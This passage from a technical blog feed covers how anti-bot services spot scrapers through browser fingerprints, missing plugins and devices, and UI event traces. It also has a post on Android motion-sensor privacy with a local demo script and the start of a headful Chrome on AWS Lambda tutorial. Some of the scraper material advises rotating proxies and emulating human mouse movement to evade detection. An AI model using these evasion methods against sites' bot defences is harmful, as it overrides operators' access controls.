<span class="w"> </span><span class="nt">"window.screen.width"</span><span class="p">:</span><span class="w"> </span><span class="mi">2560</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.height"</span><span class="p">:</span><span class="w"> </span><span class="mi">1440</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>It should not be the case that the <code>window.outerWidth</code> and <code>window.outerHeight</code> properties are smaller than
the <code>window.innerWidth</code> and <code>window.innerWidth</code> screen dimensions. This is a very strong indication
that the browser was messed with.</p>
<p>Furthermore, their scrapers don't have any plugin information (<code>navigator.plugins</code>) associated with them. This is very uncommon for legit
chrome browses. Usually, every chrome browser has standard plugin information such as </p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Plugin"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Portable Document Format"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-google-chrome-pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Viewer"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Native Client"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-nacl"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>With <code>scrapingrobot.com</code>, this information looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>Another issue with the scrapers of <code>scrapingrobot.com</code> is that they don't have any multimedia devices (<code>navigator.mediaDevices</code>) associated with the browser. Usually, a normal browser has at least one multimedia device associated (such as speakers, micros, webcams).</p>
<p>Normal:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>scrapingrobot.com:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<h3 id="fingerprinting">5. Don't disregard Fingerprinting</h3>
<p>Scraping is so hard, because there are endless ways to fingerprint a device. You can fingerprint devices on the following levels:</p>
<ol>
<li><strong>TCP/IP fingerprinting</strong> (for example with <a href="https://lcamtuf.coredump.cx/p0f3/">p0f</a>)</li>
<li><strong>TLS fingerprinting</strong> (for example with <a href="https://github.com/salesforce/ja3">ja3</a>)</li>
<li><strong>Browser/JavaScript fingerprinting</strong> (for example with <a href="https://github.com/fingerprintjs/fingerprintjs">fingerprintjs2</a>)</li>
<li>HTTP header fingerprinting</li>
<li>... and probably many others stacks where fingerprinting is applicable</li>
</ol>
<p>But why is fingerprinting so relevant for scraping?</p>
<p>Remember, when you want to create a scraper that is able to request a certain websites many 1000 times in a short time, your
overall goal for your scraping traffic is to appear to be organic, human like.</p>
<p>Put differently, your goal is to make it as hard as possible to cluster and correlate your scraping user agents into groups.</p>
<p>That is also the reason why you are using proxies. Each scraper instance changes it's IP address after a couple of requests (sometimes as low as 20).</p>
<p>But what happens if you request a certain website 1.000.000 times and you change the IP address on every 500th request. Then the website cannot reasonably block you based on the IP address level, but they can infer that you are still the very same device, because most likely your browser fingerprint does not change when the IP address changes.</p>
<p>See? </p>
<p>So what exactly constitutes a good fingerprint?</p>
<p><strong>A good fingerprint needs to have as much entropy as possible, while at the same time aiming to be resilient against minor changes!</strong> </p>
<p>Note that those two optimization goals contradict each other! You can't maximize both at the same time. It's a typical optimization problem.</p>
<p>For example, a good browser fingerprint should not change when the browser is updated. Therefore, the User-Agent is not a good entropy source for a fingerprint. Furthermore, a good fingerprint should not change when the user is switching into incognito mode. Therefore, cookies and other server side set data are no good either!</p>
<p>The much liked open source project <a href="https://github.com/fingerprintjs/fingerprintjs">fingerprintjs2</a> uses the following entropy sources to build its fingerprint:</p>
<div class="highlight"><pre><span></span><code><span class="k">export</span> <span class="kd">const</span> <span class="nx">sources</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">osCpu</span>: <span class="kt">getOsCpu</span><span class="p">,</span> <span class="c1">// navigator.oscpu</span>
<span class="nx">languages</span>: <span class="kt">getLanguages</span><span class="p">,</span> <span class="c1">// navigator.language and navigator.languages</span>
<span class="nx">colorDepth</span>: <span class="kt">getColorDepth</span><span class="p">,</span> <span class="c1">// window.screen.colorDepth</span>
<span class="nx">deviceMemory</span>: <span class="kt">getDeviceMemory</span><span class="p">,</span> <span class="c1">// navigator.deviceMemory</span>
<span class="nx">screenResolution</span>: <span class="kt">getScreenResolution</span><span class="p">,</span> <span class="c1">// screen.width and screen.height</span>
<span class="nx">availableScreenResolution</span>: <span class="kt">getAvailableScreenResolution</span><span class="p">,</span> <span class="c1">// screen.availWidth and screen.availHeight</span>
<span class="nx">hardwareConcurrency</span>: <span class="kt">getHardwareConcurrency</span><span class="p">,</span> <span class="c1">// navigator.hardwareConcurrency</span>
<span class="nx">timezoneOffset</span>: <span class="kt">getTimezoneOffset</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">timezone</span>: <span class="kt">getTimezone</span><span class="p">,</span> <span class="c1">// (new window.Intl.DateTimeFormat).resolvedOptions().timeZone</span>
<span class="nx">sessionStorage</span>: <span class="kt">getSessionStorage</span><span class="p">,</span> <span class="c1">// !!window.sessionStorage</span>
<span class="nx">localStorage</span>: <span class="kt">getLocalStorage</span><span class="p">,</span> <span class="c1">// !!window.localStorage</span>
<span class="nx">indexedDB</span>: <span class="kt">getIndexedDB</span><span class="p">,</span> <span class="c1">// !!window.indexedDB</span>
<span class="nx">openDatabase</span>: <span class="kt">getOpenDatabase</span><span class="p">,</span> <span class="c1">// !!window.openDatabase</span>
<span class="nx">cpuClass</span>: <span class="kt">getCpuClass</span><span class="p">,</span> <span class="c1">// navigator.cpuClass</span>
<span class="nx">platform</span>: <span class="kt">getPlatform</span><span class="p">,</span> <span class="c1">// navigator.platform</span>
<span class="nx">plugins</span>: <span class="kt">getPlugins</span><span class="p">,</span> <span class="c1">// navigator.plugins</span>
<span class="nx">canvas</span>: <span class="kt">getCanvasFingerprint</span><span class="p">,</span> <span class="c1">// </span>
<span class="nx">touchSupport</span>: <span class="kt">getTouchSupport</span><span class="p">,</span><span class="c1">// navigator.maxTouchPoints</span>
<span class="nx">fonts</span>: <span class="kt">getFonts</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">audio</span>: <span class="kt">getAudioFingerprint</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">pluginsSupport</span>: <span class="kt">getPluginsSupport</span><span class="p">,</span> <span class="c1">// !!navigator.plugins</span>
<span class="nx">productSub</span>: <span class="kt">getProductSub</span><span class="p">,</span> <span class="c1">// navigator.productSub</span>
<span class="nx">emptyEvalLength</span>: <span class="kt">getEmptyEvalLength</span><span class="p">,</span> <span class="c1">// eval.toString().length</span>
<span class="nx">errorFF</span>: <span class="kt">getErrorFF</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">vendor</span>: <span class="kt">getVendor</span><span class="p">,</span> <span class="c1">// navigator.vendor</span>
<span class="nx">chrome</span>: <span class="kt">getChrome</span><span class="p">,</span> <span class="c1">// window.chrome !== undefined</span>
<span class="nx">cookiesEnabled</span>: <span class="kt">areCookiesEnabled</span><span class="p">,</span> <span class="c1">// check document.cookie writable</span>
<span class="p">}</span>
</code></pre></div>
<p>As you can see from the entropy sources, they are more or less stable. But concatenated and hashed with SHA2, they have enough entropy to be very unique.</p>
<h3 id="behavior">6. Be Aware of Behavioral UI Analysis</h3>
<p>Some anti bot companies such as <a href="https://www.perimeterx.com/">PerimeterX</a> and <a href="https://www.shapesecurity.com/">Shape Security</a> record mouse movements and other user generated UI data such as scroll events or key presses.</p>
<p>The idea is to record the following JavaScript events from any visiting browser:</p>
<ul>
<li>Events indicating page load - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/load_event">load</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/DOMContentLoaded_event">DOMContentLoaded</a></li>
<li>User switches the tab - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/visibilitychange_event">visibilitychange</a></li>
<li>Mouse events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousedown_event">mousedown / mouseup</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousemove_event">mousemove</a></li>
<li>Scroll events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/scroll">scroll</a></li>
<li>Mobile Touch Events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Touch_events">touchstart / touchend</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/touchmove_event">touchmove</a></li>
<li>Keyboard events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keydown_event">keydown / keyup</a></li>
<li>Events indicating the unloading of the page - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/pagehide_event">pagehide</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event">unload</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event">beforeunload</a></li>
</ul>
<p>And then attach a relative timestamp with <code>performance.now()</code> to each such event. The data is transmitted with <code>navigator.sendBeacon()</code>, an Image Pixel or in real time with Web Sockets. </p>
<p>This will result in a time series of user generated events for the time spent on the recorded website.</p>
<p>With this data (or the lack of the data), you can derive several conclusions about the behavior of the visiting user.</p>
<p>For example, all of the above researched scraping companies</p>
<ol>
<li><a href="https://scrapingbee.com">ScrapingBee</a></li>
<li><a href="https://scrapingrobot.com">scrapingrobot.com</a></li>
<li><a href="https://www.scraperapi.com/">scraperapi.com</a></li>
</ol>
<p>do not produce such UI events for their headless scrapers. All they produce is the following event trace (scrapingbee.com was used as an example):</p>
<div class="highlight"><pre><span></span><code>[
["DOMContentLoaded", 2716.16],
["load", 3363.74],
["pagehide",false, 4728.83],
["visibilitychange","hidden", 4729.195],
["unload", 4729.485],
]
</code></pre></div>
<p>As you can see, their scraper is only 1.4 seconds on the website (time difference from <code>pagehide</code> to <code>load</code> event).</p>
<p>Compare this to an event trace of a real human visitor:</p>
<div class="highlight"><pre><span></span><code>[
["DOMContentLoaded",373.36],
["load",428.55],
["mousemove",948,30,749.33],
["mousemove",969,119,765.54],
["mousemove",1000,176,781.81],
["mousemove",1053,218,798.47],
["mousemove",1133,227,,815.335],
["mousemove",1222,218,831.815],
["mousemove",1300,185,848.86],
...
["beforeunload",1632.67],
["pagehide",false,1635.35],
["visibilitychange","hidden",1635.57],
["unload",1635.85],
["visibilitychange","hidden",1639.87],
]
</code></pre></div>
<p>This event traced was produced by moving the mouse quickly and then leaving the page.</p>
<p>So the real question is: Isn't it quite common that some people just open a page, but never choose to interact with the page? </p>
<p>This is not an easy question to answer, but in reality, most humans that open a website and quickly navigate away at least emit a few <code>mousemove</code> and <code>scroll</code> events. Even if they navigate the page with the keyboard, they usually emit some keyboard combination that switches the tab or closes the page.</p>
<p>It is quite rare that real human beings just open a page and never interact with it. On Desktop systems, this could for example happen if you are browsing a page and click on a link with the middle mouse pointer: This opens a page without switching the tab to it.</p>
<p>Nevertheless, a pattern such as the above is quite rare for real human user agents. If the above event trace appears a lot on a website, it is relatively safe to assume that the user agent is a robot.</p>
<p>How can you equip your scraper with real humanly generated synthetic behavioral data?</p>
<p>There is a module called <a href="https://github.com/Xetera/ghost-cursor">ghost-cursor</a> which simulates human mouse movements with the help of <a href="https://en.wikipedia.org/wiki/B%C3%A9zier_curve">Bezier</a> curves and <a href="https://en.wikipedia.org/wiki/Fitts%27s_law">Fitts's law</a>. Fitt's Law suggests according to Wikipedia:</p>
<p>A movement during a single Fitts's law task can be split into two phases:</p>
<ol>
<li><strong>Initial movement</strong>. A fast but imprecise movement towards the target. The first phase is defined by the distance to the target. In this phase the distance can be closed quickly while still being imprecise.</li>
<li><strong>Final movement</strong>. Slower but more precise movement in order to acquire the target. The second movement tries to perform a slow and controlled precise movement to actually hit the target.</li>
</ol>
<p>It's best to use <a href="https://github.com/Xetera/ghost-cursor">ghost-cursor</a> in combination with <a href="https://github.com/berstend/puppeteer-extra/tree/automation-extra/packages/plugin-humanize">plugin-humanize</a> according to the authors.</p>
<p>For example, one <strong>big problem with ghost-cursor</strong>: Mouse movement always starts in the perfect origin (0, 0). Real humans start their mouse movement somewhere random on the page or somewhere on the top/left side of the window.</p>
<p>Another alternative is to use the kinda new scraping browser project <a href="https://github.com/ulixee/secret-agent">secret-agent</a>. The <a href="https://secretagent.dev/docs/advanced/human-emulators">documentation of the HumanEvaluator</a> promises:</p>
<blockquote>
<p>HumanEmulators are plugins that sit between your script and SecretAgent's mouse/keyboard movements. They translate your clicks and moves into randomized human-like patterns that can pass the bot-blocker checks.</p>
</blockquote>
<p>I haven't tested <a href="https://github.com/ulixee/secret-agent">secret-agent</a> extensively, but it appears to be a very ambitious project. Could be too ambitious after all. Sometimes, simplicity is key.</p>
<h3 id="sideChannel">7. Side Channel Attacks can Reveal that you are a Bot</h3>
<p>Side channel attacks regarding browsers are a endlessly large group. When you are using a real browser for your scraping projects, you are exhibiting an extremely vast side channel attack surface to the website you are visiting.</p>
<p>To give you some quick overview, those are some examples that leak information about the environment where your browser (and thus scraper) is running:</p>
<ol>
<li><a href="https://crypto.stanford.edu/~dabo/pubs/abstracts/browserRedPills.html">Browser Red Pills</a> - Timing JavaScript code with <code>performance.now()</code> in order to make educated guesses whether the browser is running in an virtual machine.</li>
<li>Proof of Work Captchas such as <a href="https://friendlycaptcha.com/">friendlycaptcha</a> </li>
<li><a href="https://www.dnsleaktest.com/what-is-a-dns-leak.html">DNS Leaks</a> - They occur when the DNS Name is not resolved by the anonymous tunnel that you are using for hiding your browser traffic</li>
<li><a href="https://browserleaks.com/webrtc">WebRTC Leaks</a> </li>
<li><a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">Browser Based Port Scanning</a> - Port scanning the internal network where your scraper is running might reveal a lot about your network. Or for example that you are running a browser on a VPS with open ports 9222 or 22.</li>
</ol>
<h2>Conclusion</h2>
<p>To be done.</p>Why does this Website know that I am sitting on the Toilet?2021-02-05T22:17:00+01:002021-02-18T22:17:00+01:00Nikolai Tschachertag:incolumitas.com,2021-02-05:/2021/02/05/why-does-this-website-know-i-am-sitting-on-the-toilet/<p>Android mobile devices give to any website device orientation and device motion data. This data is quite sensitive in nature and should not be granted to websites without obtaining explicit user consent.</p><p>Android smartphones grant websites access to the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/deviceorientation_event">deviceorientation</a> and the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/devicemotion_event">devicemotion</a> events.</p>
<p>Those events basically give information about real time smartphone motion data and rotation angels. This data comes from the built-in accelerometer, <a href="https://en.wikipedia.org/wiki/Gyroscope">gyroscope</a> and compass from mobile devices.</p>
<p>So if you are visiting this website from your Android mobile phone, you can see your device motion data in the box below.</p>
<div id="example" style="border-color: 3px solid #aaa; padding: 12px">
<strong>`deviceorientation` events</strong>
<pre id="deviceorientationOutput">{}</pre>
<hr />
<strong>`devicemotion` events</strong>
<pre id="devicemotionOutput">{}</pre>
<script>
(function() {
var isAndroid = /(android)/i.test(navigator.userAgent);
if (!isAndroid) {
document.getElementById('example').innerHTML = '<strong>You\'re not visiting from an Android device</strong>';
return;
}
function round2(num) {
return +(Math.round(num + "e+2") + "e-2");
}
window.addEventListener('devicemotion', function(event) {
var x = event.acceleration.x;
var y = event.acceleration.y;
var z = event.acceleration.z;
// An object giving the rate of change of the device's orientation
// on the three orientation axis alpha, beta and gamma.
// Rotation rate is expressed in degrees per seconds.
var rotationRate = event.rotationRate;
// A number representing the interval of time, in milliseconds, at which data is obtained from the device.
var interval = event.interval;
if (x !== null && y !== null && z !== null) {
// only emit the event if device motion is more than
// 0.5 m/s2 in one of the axises
if (Math.abs(x) > 0.5 || Math.abs(y) > 0.5 || Math.abs(z) > 0.5) {
var el = document.getElementById('devicemotionOutput');
el.innerHTML = JSON.stringify({
event: 'devicemotion',
accelerationX: round2(x),
accelerationY: round2(y),
accelerationZ: round2(z),
interval: interval,
}, null, 2);
}
}
})
window.addEventListener('deviceorientation', function(event) {
// only consider significant changes in rotation
if (Math.abs(self.alpha - event.alpha) < 1
|| Math.abs(self.gamma - event.gamma) < 1
|| Math.abs(self.beta - event.beta) < 1) {
return;
}
this.alpha = event.alpha;
this.beta = event.beta;
this.gamma = event.gamma;
if (event.alpha !== null && event.beta !== null && event.gamma !== null) {
var el = document.getElementById('deviceorientationOutput');
el.innerHTML = JSON.stringify({
event: 'deviceorientation',
alpha: round2(event.alpha),
beta: round2(event.beta),
gamma: round2(event.gamma),
absolute: event.absolute,
}, null, 2);
}
})
})();
</script>
</div>
<h3>Sensitive Nature of Motion and Orientation Data</h3>
<p>Smartphone motion and orientation data can possibly reveal a lot about your real live behavior while browsing a website. Some of the following information can be interpolated by interpreting motion and orientation data of your device:</p>
<ul>
<li>In what position your are interacting with the website: Sitting, lying, standing, running, ...</li>
<li>Whether you are moving around while looking at the website</li>
<li>If your smartphone is falling down (which would be an excellent point to backup data)</li>
</ul>
<p>For example, if you follow a video conference with your Android smartphone or tablet while lying in your bed, it would be possible to infer from the device orientation and motion data that you are lying in your bed, even though you disabled your camera and microphone preemptively...Isn't that a bit creepy? Why is this website allowed to infer what I am currently doing in real life?</p>
<p>Furthermore, I am quite sure that it would also be possible to infer that you are visiting the toilet based on a time series of motion and device orientation data. The reason is the following: There is a unique pattern of motion and orientation data when making a visit to the toilet. First you are walking to a room, then you sit down and then you hold your phone in a certain angle. It is very likely, that there is some unique pattern in device motion and orientation data that correlates with visits to the toilet...</p>
<p>Apple has a clear stance regarding the <code>deviceorientation</code> and <code>devicemotion</code> event on their iOS platform: Those events are <a href="https://www.macrumors.com/2019/02/04/ios-12-2-safari-motion-orientation-access-toggle/">disabled by default</a> and a website needs to <a href="https://dev.to/li/how-to-requestpermission-for-devicemotion-and-deviceorientation-events-in-ios-13-46g2">ask for permission in order to use them</a>. Why is this not the case on the Android operating system?</p>
<h3>The <code>deviceorientation</code> Event</h3>
<p><code>let evt = DeviceOrientationEvent</code></p>
<p>This event yields a <a href="https://developer.mozilla.org/en-US/docs/Web/API/DeviceOrientationEvent">DeviceOrientationEvent</a> object every 10ms. This event includes the following information:</p>
<ul>
<li><code>evt.absolute</code> - A boolean that indicates whether or not the device is providing orientation data absolutely.</li>
<li>
<p><code>evt.alpha</code> - A number representing the motion of the device around the z axis, express in degrees with values ranging from 0 (inclusive) to 360 (exclusive).</p>
</li>
<li>
<p><code>evt.beta</code> - A number representing the motion of the device around the x axis, express in degrees with values ranging from -180 (inclusive) to 180 (exclusive). This represents a front to back motion of the device.</p>
</li>
<li><code>evt.gamma</code> - A number representing the motion of the device around the y axis, express in degrees with values ranging from -90 (inclusive) to 90 (exclusive). This represents a left to right motion of the device.</li>
</ul>
<figure>
<img src="/images/deviceorientation.png" alt="deviceorientation" style="width:700px" />
<figcaption>You can simulate device orientation data with Chrome Dev Tools</figcaption>
</figure>
<h3>The <code>devicemotion</code> Event</h3>
<p><code>let evt = DeviceOrientationEvent</code></p>
<p>This event yields a <a href="https://developer.mozilla.org/en-US/docs/Web/API/DeviceMotionEvent"><code>DeviceMotionEvent</code></a> object every 10ms. This event includes the following information:</p>
<ul>
<li><code>evt.acceleration</code> - An object giving the acceleration of the device on the three axis X, Y and Z. Acceleration is expressed in m/s2.</li>
<li><code>evt.accelerationIncludingGravity</code> - An object giving the acceleration of the device on the three axis X, Y and Z with the effect of gravity. Acceleration is expressed in m/s2.</li>
<li><code>evt.rotationRate</code> - An object giving the rate of change of the device's orientation on the three orientation axis alpha, beta and gamma. Rotation rate is expressed in degrees per seconds.</li>
<li><code>evt.interval</code> - A number representing the interval of time, in milliseconds, at which data is obtained from the device.</li>
</ul>Headful Google Chrome with Xvfb on AWS Lambda Container2021-01-23T14:40:00+01:002021-01-23T14:40:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-23:/2021/01/23/run-xvfb-on-aws-lambda-container/<p>The following write-up is an attempt to launch headful Google Chrome with Xvfb on AWS Lambda container.</p><h3>Introduction</h3>
<p>In this quick tutorial, it is attempted to run <strong>headful</strong> Google Chrome on AWS Lambda with the <code>Xvfb</code> virtual display framebuffer server.</p>
<p>Sometimes headless browsers are not enough. Sometimes you need a browser that is indistinguishable from a real browser and
it needs to run with a virtual frame buffer. The goal of this article is to run the Google Chrome browser in AWS Lambda with <code>Xvfb</code> using a Docker container.</p>
<p>Since December 2020, it is now possible to run <a href="https://aws.amazon.com/blogs/aws/new-for-aws-lambda-container-image-support/">Docker images in AWS Lambda</a>. You now have full support over the operating system stack, as long
as your container either derives a AWS Lambda base image or it implements the Lambda runtime API.</p>
<h3>What works</h3>
<p>Running the specifically for AWS Lambda compiled chromium browser from the project <a href="https://github.com/alixaxel/chrome-aws-lambda">chrome-aws-lambda</a> seems to work fine with Lambda Docker.</p>
<p>This is the Dockerfile:</p>
<div class="highlight"><pre><span></span><code><span class="k">FROM</span><span class="w"> </span><span class="s">public.ecr.aws/lambda/nodejs:12</span>
<span class="k">RUN</span><span class="w"> </span>mkdir /app
<span class="k">WORKDIR</span><span class="w"> </span><span class="s">/app</span>
<span class="k">COPY</span><span class="w"> </span>package*.json /app/
<span class="k">RUN</span><span class="w"> </span>npm install
<span class="k">COPY</span><span class="w"> </span>run.js /app/
<span class="k">CMD</span><span class="w"> </span><span class="p">[</span><span class="s2">"/app/run.handler"</span><span class="p">]</span>
</code></pre></div>
<p>This is the package.json:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"lambda-container"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.0.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"main"</span><span class="p">:</span><span class="w"> </span><span class="s2">"run.js"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scripts"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"test"</span><span class="p">:</span><span class="w"> </span><span class="s2">"echo \"Error: no test specified\" && exit 1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"author"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"license"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ISC"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dependencies"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"chrome-aws-lambda"</span><span class="p">:</span><span class="w"> </span><span class="s2">"^5.5.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"puppeteer-core"</span><span class="p">:</span><span class="w"> </span><span class="s2">"^5.5.0"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>This is <code>run.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">chromium</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-aws-lambda'</span><span class="p">);</span>
<span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">context</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">browser</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">args</span><span class="p">,</span>
<span class="nx">defaultViewport</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">defaultViewport</span><span class="p">,</span>
<span class="nx">executablePath</span><span class="o">:</span> <span class="k">await</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">executablePath</span><span class="p">,</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span> <span class="c1">// we will use headful chrome</span>
<span class="nx">ignoreHTTPSErrors</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">let</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">url</span> <span class="o">||</span> <span class="s1">'https://bot.incolumitas.com'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">3000</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">new_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#new-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
